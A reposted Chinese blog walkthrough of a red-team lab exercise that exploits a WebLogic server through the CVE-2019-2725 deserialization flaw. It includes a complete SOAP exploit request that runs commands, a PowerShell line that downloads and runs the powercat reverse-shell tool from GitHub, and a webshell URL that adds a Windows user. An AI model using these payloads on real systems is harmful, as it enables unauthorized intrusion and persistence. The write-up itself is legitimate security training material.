靶機練習 - ATT&CK紅隊評估實戰靶場二 - 2. WebLogic漏洞利用

本文轉載自查看原文 2020-11-06 17:25 1763 安全測試/ 漏洞復現/ ATT&CK紅隊實戰靶場/ WebLogic漏洞利用/ CVE-2019-2725/ ATT&CK紅隊評估實戰靶場二/ ATT&CK/ 靶機練習

端口掃描

174.140端口掃描結果：

174.141端口掃描結果：

Weblogic漏洞掃描

174.140的7001端口是Weblogic的端口，用Weblogic漏洞掃描工具進行掃描：

找到了管理后台，嘗試了簡單的口令爆破，木有成功，另外還發現了SSRF漏洞和Java反序列化漏洞，SSRF漏洞可以用來探測內網服務器以及端口是否存在。關閉上帝視角，目前是不知道內網網段的，猜起來也挺費勁，先試試Java反序列化漏洞。

漏洞利用

1.msf exp

msf有現成的exp，趕緊用起來：

木有執行成功，猜測原因可能是msf的攻擊目標是Unix，而我的目標機器是Window。

2.手工命令執行

接下來借助burp手動執行：

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.174.140:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
content-type: text/xml
Connection: keep-alive
Accept-Encoding: gzip, deflate
Content-Length: 731

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>calc.exe</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

View Code

試了一下只要soapenv構造沒問題，無論命令失敗還是成功都會返回202，並且木有回顯，比較尷尬 >_<...。開啟上帝視角，去靶機瞄了一眼，計算器彈出，執行成功了~

既然可以執行命令，接下來的思路就是想辦法反彈shell，windows的命令行反彈shell咱沒弄過，搜了下可用通過powershell下載反彈工具：

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

View Code

發過去半天木有反應，開啟上帝視角去靶機瞄了一下，被攔了2333...

3.CVE-2019-2725 EXP腳本

網上找到一個POC：https://github.com/TopScrew/CVE-2019-2725

用了一下命令執行發現帶空格的命令會報錯，再嘗試傳webshell：

添加新用戶

http://192.168.174.140:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=net user test2 test_2@1qaz /add

hmmm.....執行失敗....

去靶機看了下，又被攔了阿西巴，之前還一直很鄙視某60來着，覺得某P用沒得。。。

4.JAVA反序列化利用工具

網上下了JAVA反序列化工具(名為Java反序列化終極測試工具，嗯，名字很霸氣，希望不要再撲街)，用該工具傳webshell上去。Weblogic的上傳路徑參考：https://www.cnblogs.com/sstfy/p/10350915.html

再用工具連接，終於成功了啦啦啦(～￣▽￣)～

本文僅用於技術學習和交流，嚴禁用於非法用途，否則產生的一切后果自行承擔。

如需轉載，請注明出處，這是對他人勞動成果的尊重。

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 靶機練習 - ATT&CK紅隊實戰靶場 - 1. 環境搭建和漏洞利用靶機練習 - ATT&CK紅隊實戰靶場 - 2. 內網信息收集靶機練習 - ATT&CK紅隊評估實戰靶場二- 1. 環境搭建靶機練習 - ATT&CK紅隊評估實戰靶場二 - 3.提權和內網信息搜集滲透靶場—ATT&CK紅隊評估實戰靶場（一） ATT&CK紅隊評估實戰靶場(一) 靶機練習 - ATT&CK紅隊實戰靶場 - 3. Windows提權 ATT&CK實戰系列——紅隊實戰（三） ATT&CK實戰系列——紅隊實戰（二） ATT&CK實戰系列——紅隊實戰（七）